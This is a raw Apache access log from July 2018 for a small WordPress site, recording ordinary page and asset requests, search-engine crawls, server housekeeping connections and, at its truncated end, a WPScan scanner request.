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177.139.106.22 - - [23/Jul/2018:06:41:07 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"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66.249.66.72 - - [23/Jul/2018:06:50:11 +0000] "GET /robots.txt HTTP/1.1" 404 501 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"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66.249.66.70 - - [23/Jul/2018:06:50:12 +0000] "GET / HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"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91.197.18.146 - - [23/Jul/2018:06:51:16 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"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103.3.225.102 - - [23/Jul/2018:06:51:38 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"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75.149.221.170 - - [23/Jul/2018:07:19:02 +0000] "GET / HTTP/1.1" 200 927 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100508 SeaMonkey/2.0.4"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66.249.66.74 - - [23/Jul/2018:07:25:21 +0000] "GET /wordpress/ HTTP/1.1" 404 50691 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"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47.203.95.204 - - [23/Jul/2018:08:11:52 +0000] "GET http://httpheader.net/ HTTP/1.1" 200 605 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)"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85.105.189.121 - - [23/Jul/2018:08:12:12 +0000] "GET / HTTP/1.0" 200 942 "-" "-"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109.94.177.117 - - [23/Jul/2018:09:02:42 +0000] "GET / HTTP/1.0" 200 942 "-" "-"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195.208.173.17 - - [23/Jul/2018:09:03:32 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"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103.84.165.223 - - [23/Jul/2018:09:10:28 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"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185.140.232.250 - - [23/Jul/2018:10:05:48 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"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[23/Jul/2018:10:26:45 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET / HTTP/1.1 29079 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:45 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/css/dashicons.min.css?ver=4.8.7 HTTP/1.1 28612 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:45 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/css/admin-bar.min.css?ver=4.8.7 HTTP/1.1 3877 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/scripts/prettyphoto/prettyPhoto.css?ver=4.8.7 HTTP/1.1 3430 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/style.css?ver=4.8.7 HTTP/1.1 15497 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/scripts/flexslider/flexslider.css?ver=4.8.7 HTTP/1.1 1392 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/scripts/flexslider/jquery.flexslider-min.js?ver=4.8.7 HTTP/1.1 5268 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/styles/default.css?ver=4.8.7 HTTP/1.1 341 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1 4014 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/scripts/galleryManager.js?ver=4.8.7 HTTP/1.1 1074 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/scripts/prettyphoto/jquery.prettyPhoto.js?ver=4.8.7 HTTP/1.1 9388 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1 33766 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/assets/images/header.jpg HTTP/1.1 114854 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/soworthloving-wallpaper.jpg HTTP/1.1 26897 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/admin-bar.min.js?ver=4.8.7 HTTP/1.1 2470 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/assets/js/global.js?ver=1.0 HTTP/1.1 2606 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js?ver=1.0 HTTP/1.1 416 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js?ver=2.1.2 HTTP/1.1 2409 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/wp-embed.min.js?ver=4.8.7 HTTP/1.1 751 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/image-alignment-580x300.jpg HTTP/1.1 9082 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/image-alignment-150x150.jpg HTTP/1.1 2844 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/image-alignment-1200x4002.jpg HTTP/1.1 35514 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/image-alignment-300x200.jpg HTTP/1.1 6446 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2012/07/manhattansummer.jpg?w=150 HTTP/1.1 132460 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/featured-image-vertical.jpg HTTP/1.1 5132 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/featured-image-horizontal.jpg HTTP/1.1 5962 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/wp-emoji-release.min.js?ver=4.8.7 HTTP/1.1 4323 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /favicon.ico HTTP/1.1 286 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[23/Jul/2018:10:26:45 +0000] ganga.site 18.185.130.70 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 POST /wp-cron.php?doing_wp_cron=1532341605.4026811122894287109375 HTTP/1.1 - "-" "WordPress/4.8.7; https://ganga.site"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::1 - - [23/Jul/2018:10:26:53 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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193.59.45.41 - - [23/Jul/2018:10:38:53 +0000] "GET / HTTP/1.0" 200 942 "-" "-"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94.242.54.22 - - [23/Jul/2018:10:51:31 +0000] "GET / HTTP/1.1" 200 659 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:31 +0000] "GET /icons/blank.gif HTTP/1.1" 200 431 "http://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:31 +0000] "GET /icons/folder.gif HTTP/1.1" 200 508 "http://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:31 +0000] "GET /favicon.ico HTTP/1.1" 404 501 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:33 +0000] "GET /wordpress/ HTTP/1.1" 404 50690 "http://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:33 +0000] "GET /wp-content/themes/twentyseventeen/style.css?ver=4.8.7 HTTP/1.1" 404 534 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:33 +0000] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 404 521 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:33 +0000] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 404 534 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:33 +0000] "GET /wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js?ver=1.0 HTTP/1.1" 404 557 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:34 +0000] "GET /wp-includes/js/wp-embed.min.js?ver=4.8.7 HTTP/1.1" 404 520 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:34 +0000] "GET /wp-includes/js/wp-emoji-release.min.js?ver=4.8.7 HTTP/1.1" 404 528 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:34 +0000] "GET /wp-content/themes/twentyseventeen/assets/js/global.js?ver=1.0 HTTP/1.1" 404 544 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:34 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/styles/default.css?ver=4.8.7 HTTP/1.1 341 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:34 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/scripts/galleryManager.js?ver=4.8.7 HTTP/1.1 1074 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:34 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/scripts/flexslider/flexslider.css?ver=4.8.7 HTTP/1.1 1392 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:34 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/scripts/prettyphoto/prettyPhoto.css?ver=4.8.7 HTTP/1.1 3430 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:35 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/scripts/flexslider/jquery.flexslider-min.js?ver=4.8.7 HTTP/1.1 5268 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:35 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/scripts/prettyphoto/jquery.prettyPhoto.js?ver=4.8.7 HTTP/1.1 9388 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:35 +0000] "GET /wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js?ver=2.1.2 HTTP/1.1" 404 553 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:35 +0000] "GET /wp-content/themes/twentyseventeen/assets/images/header.jpg HTTP/1.1" 404 548 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:35 +0000] "GET /wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js?ver=1.0 HTTP/1.1" 404 556 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:35 +0000] "GET /wp-content/themes/twentyseventeen/assets/js/global.js?ver=1.0 HTTP/1.1" 404 543 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:35 +0000] "GET /wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js?ver=2.1.2 HTTP/1.1" 404 552 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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94.242.54.22 - - [23/Jul/2018:10:51:36 +0000] "GET /wp-includes/js/wp-embed.min.js?ver=4.8.7 HTTP/1.1" 404 520 "http://ganga.site/wordpress/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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::1 - - [23/Jul/2018:10:51:40 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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::1 - - [23/Jul/2018:10:51:41 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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::1 - - [23/Jul/2018:10:51:42 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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::1 - - [23/Jul/2018:10:51:43 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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::1 - - [23/Jul/2018:10:51:44 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:10:51:52 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET / HTTP/1.1 27200 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js?ver=1.0 HTTP/1.1 416 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/style.css?ver=4.8.7 HTTP/1.1 15497 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1 33766 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1 4014 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/wp-emoji-release.min.js?ver=4.8.7 HTTP/1.1 4323 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/assets/js/global.js?ver=1.0 HTTP/1.1 2606 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js?ver=2.1.2 HTTP/1.1 2409 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/wp-embed.min.js?ver=4.8.7 HTTP/1.1 751 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/soworthloving-wallpaper.jpg HTTP/1.1 26897 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/image-alignment-580x300.jpg HTTP/1.1 9082 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/image-alignment-150x150.jpg HTTP/1.1 2844 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/image-alignment-1200x4002.jpg HTTP/1.1 35514 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:54 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/image-alignment-300x200.jpg HTTP/1.1 6446 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:54 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/featured-image-horizontal.jpg HTTP/1.1 5962 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:54 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2013/03/featured-image-vertical.jpg HTTP/1.1 5132 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/assets/images/header.jpg HTTP/1.1 114854 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:54 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2012/07/manhattansummer.jpg?w=150 HTTP/1.1 132460 "https://ganga.site/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:55 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /favicon.ico HTTP/1.1 286 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:10:51:55 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /favicon.ico HTTP/1.1 286 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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::1 - - [23/Jul/2018:10:52:01 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:08:35 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET / HTTP/1.1 96418 "https://ganga.site/" "WPScan v2.9.5-dev 